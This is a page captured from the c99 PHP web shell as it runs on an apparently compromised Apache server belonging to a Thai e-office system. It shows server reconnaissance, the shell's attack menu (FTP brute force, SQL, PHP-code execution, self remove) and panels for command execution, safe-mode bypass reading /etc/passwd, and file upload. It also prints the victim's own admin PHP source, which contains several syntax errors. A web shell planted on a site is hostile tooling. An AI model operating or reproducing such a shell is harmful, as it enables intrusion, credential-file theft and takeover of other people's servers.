!c99Shell v. 1.0 pre-release build #16!

Software: Apache/2.2.3 (CentOS). PHP/5.1.6 

uname -a: Linux mx-ll-110-164-51-230.static.3bb.co.th 2.6.18-194.el5PAE #1 SMP Fri Apr 2 15:37:44
EDT 2010 i686 

uid=48(apache) gid=48(apache) groups=48(apache) 

Safe-mode: OFF (not secure)

/var/www/html/mistk/eoffice/admin/   drwxr-xr-x
Free 52.23 GB of 127.8 GB (40.87%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Feedback    Self remove    Logout    


Viewing file:     processHisDocToNewDept.php (5.32 KB)      -rw-r--r--
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
<?php
include_once("../../class/clsConnection.php");
include_once("../../class/clsDB.php");
include_once "../global.php";
include_once "../class/clsDepartment.php";
include_once "../class/clsPerson.php";
include_once "../link/function.php";
include_once "../link/functionshow.php";
include_once "../class/clsDocLinePosition.php";
include_once "../class/clsDocLineConfig.php";
include_once "../class/clsReceiveSendType.php";
include_once "../class/clsDocType.php";
include_once "../class/clsDocSpeedLevel.php";
include_once "../class/clsDocSecreLevel.php";
include_once "../class/clsDocattatchesTmp.php";
include_once "../class/clsDocuments.php";
include_once "../class/clsDocattatches.php";
include_once "../class/clsDocReceiveSend.php";
include_once "../class/clsRunningDoc.php";
include_once "../class/clsDocForSign.php";

$oC = new clsConnection($GLOBALS['DBHOST'], $GLOBALS['DBNAME_EOFFICE'], $GLOBALS['DBUSER_EOFFICE'], $GLOBALS['DBPASS_EOFFICE']);

$oDP = new Department($oC);
$oDP2 = new Department($oC);
$oDP3 = new Department($oC);
$oDP4 = new Department($oC);
$oDP5 = new Department($oC);
$oPS = new person($oC);
$oPS2 = new person($oC);
$oPS3 = new person($oC);
$oDlc = new DocLineConfig($oC);
$oDlc2 = new DocLineConfig($oC);
$oDlc3 = new DocLineConfig($oC);
$oDlp = new docLinePosition($oC);
$oDlp1 = new docLinePosition($oC);
$oRSt = new receiveSendType($oC);
$oDt = new doctype($oC);
$oDsl = new DocSpeedLevel($oC);
$oDcl = new DocSecretLevel($oC);
$oDtmp = new DocattatchesTmp($oC);
$oDoc = new Documents($oC);
$oDoc2 = new Documents($oC);
$oDatt = new Docattatches($oC);
$oDatt2 = new Docattatches($oC);
$oRs = new DocReceiveSend($oC);
$oRs1 = new DocReceiveSend($oC);
$oRs2 = new DocReceiveSend($oC);
$oRs3 = new DocReceiveSend($oC);
$oRs4 = new DocReceiveSend($oC);
$oRd = new runningdoc($oC);
$oDfs = new DocForSign($oC);

$MaxDocGroup=$oDP->SearchMaxDocGroup();

    $flagCommit true;
    $checkflagCommittrue;
    $oC->BeginTrans();


$oDoc2->SearchByKey($DocID);
$oDoc2->GetRecord();

$timeDocDateCreate=getNowDateTh()." ".date('H:i:s');
$oDlc->SearchByKey($Dlcid); $oDlc->GetRecord();
    if($Dlcsecond=="Y"){
        $oDlc2->SearchByKey($DlcsecondId); $oDlc2->GetRecord(); 
        $mypersonId=$oDlc2->personId;
    }else{
        $mypersonId=$oDlc->personId;
    }

                $oDoc->AddNew();
                $oDoc->DocID=$oDoc->GetNextCode();
                $e=$oDoc->GetNextCode();
                $oDoc->DlcID=$Dlcid;
                $oDoc->PtID=$oDoc2->PtID;
                $oDoc->DtID=$oDoc2->DtID;
                $oDoc->DslID=$oDoc2->DslID;
                $oDoc->DclID=$oDoc2->DclID;
                $oDoc->DsID=1;
                $oDoc->RsID=$oDoc2->RsID;
                $oDoc->DocDateCreate=$timeDocDateCreate;
                $oDoc->DocUserCreate=$mypersonId;
                $oDoc->DocTypeNo=$oDoc2->DocTypeNo;
                $oDoc->DocDate=$oDoc2->DocDate;
                $oDoc->DocNo=$oDoc2->DocNo;
                $oDoc->DocSubject=$oDoc2->DocSubject;
                $oDoc->DocFrom=$oDoc2->DocFrom;
                $oDoc->DocTo=$oDoc2->DocTo;
                $oDoc->DocShortDesc=$oDoc2->DocShortDesc;
                $oDoc->DocSpeedLevelDueDate=$oDoc2->DocSpeedLevelDueDate;
                $oDoc->DocStart=$oDoc2->DocStart;
                $oDoc->DocFinish=$oDoc2->DocFinish;
                $oDoc->DocGroup=$MaxDocGroup;
                $oDoc->DocRef=$oDoc2->DocRef;
                $oDoc->DocCircular=$oDoc2->DocCircular;
                $oDoc->DocfCir=$oDoc2->DocfCir;
                $oDoc->DocOther=$oDoc2->DocOther;
                $oDoc->CertificatePs=$oDoc2->CertificatePs;
                $oDoc->fDelete=$oDoc2->fDelete;
                $oDoc->endDoc=$oDoc2->endDoc;
                $oDoc->sendToPs=$oDoc2->sendToPs;
                $oDoc->AnID=$oDoc2->AnID;
                $oDoc->DocRefAns=$oDoc2->DocRefAns;
                $oDoc->DocRefAnsID=$oDoc2->DocRefAnsID;
                $oDoc->useMainDocNo=$oDoc2->useMainDocNo;
                $oDoc->DocforSign=$oDoc2->DocforSign;
                $oDoc->DocTelOwner=$oDoc2->DocTelOwner;
                $oDoc->DocSendReal=$oDoc2->DocSendReal;
                $oDoc->DocDeptOwner=$oDoc2->DocDeptOwner;
                $oDoc->DocFaxOwner=$oDoc2->DocFaxOwner;
                $oDoc->DocCopySend=$oDoc2->DocCopySend;
                $oDoc->DocContactE=$oDoc2->DocContactE;
                $oDoc->DocIDHisOld=$DocID;
                $checkflagCommit $oDoc->Save();
                if(!$checkflagCommit){ $flagCommit=$checkflagCommit;   }


                $oRs->AddNew();
                $oRs->DrsID=$oRs->GetNextCode();
                $oRs->DocID=$e;
                $oRs->DlcID=$Dlcid;
                $oRs->DsID=1;
                $oRs->DrsDocTypeNo=$oDoc2->DocTypeNo;
                $oRs->DrsReceiveDate=$timeDocDateCreate;
                $oRs->DrsReceivePersonId=$mypersonId;
                $oRs->DrsDlcIDCreate=$Dlcid;
                $oRs->DrsPsIDCreate=$oDlc->personI;
                $oRs->DocGroup=$MaxDocGroup;    
                $checkflagCommit $oRs->Save();
                if(!$checkflagCommit){ $flagCommit=$checkflagCommit;   }
                 
                 
                 
                if($oDoc2->DocPID=="0" || $oDoc2->DocPID==""){  $searchDoc=$oDoc2->DocID; }else{ $searchDoc=$oDoc2->DocPID; } 
                $oDatt2->SearchByDocID($searchDoc);
                while($oDatt2->GetRecord()){
                    $oDatt->AddNew();
                    $oDatt->DaID=$oDatt->GetNextCode();
                    $oDatt->DocID=$e;
                    $oDatt->DaFileName=$oDatt2->DaFileName;
                    $oDatt->DaUpFileName=$oDatt2->DaUpFileName
                    $oDatt->DaSeq=$oDatt2->DaSeq;
                    $oDatt->DaAddNew=$oDatt2->DaAddNew;
                    $oDatt->DaAddNewSended=$oDatt2->DaAddNewSended;
                    $checkflagCommit $oDatt->Save();
                    if(!$checkflagCommit){ $flagCommit=$checkflagCommit;   }
                }

                $oDoc2->Edit();
                $oDoc2->DocIDHisNew=$e;
                $checkflagCommit $oDoc2->Save();
                if(!$checkflagCommit){ $flagCommit=$checkflagCommit;   }

                    if($flagCommit)
                        $oC->CommitTrans();
                    else
                        $oC->RollbackTrans();    

$saveurlencode=base64_decode($saveurlencode);
echo "<meta http-equiv='refresh' content='0; URL=printRepHisRegisDocDeptToNewDept.php?$saveurlencode'>";
?>

:: Command execute ::

Enter:
 
Select:
 

:: Shadow's tricks :D ::

Useful Commands
 
Warning. Kernel may be alerted using higher levels
Kernel Info:

:: Preddy's tricks :D ::

Php Safe-Mode Bypass (Read Files)

File:

eg: /etc/passwd
Php Safe-Mode Bypass (List Directories):

Dir:

eg: /etc/

:: Search ::
  - regexp 
:: Upload ::
 
[ ok ]

:: Make Dir ::
 
[ ok ]
:: Make File ::
 
[ ok ]

:: Go Dir ::
 
:: Go File ::
 

--[ c999shell v. 1.0 pre-release build #16 Modded by Shadow & Preddy | RootShell Security Group | r57 c99 shell | Generation time: 0.0068 ]--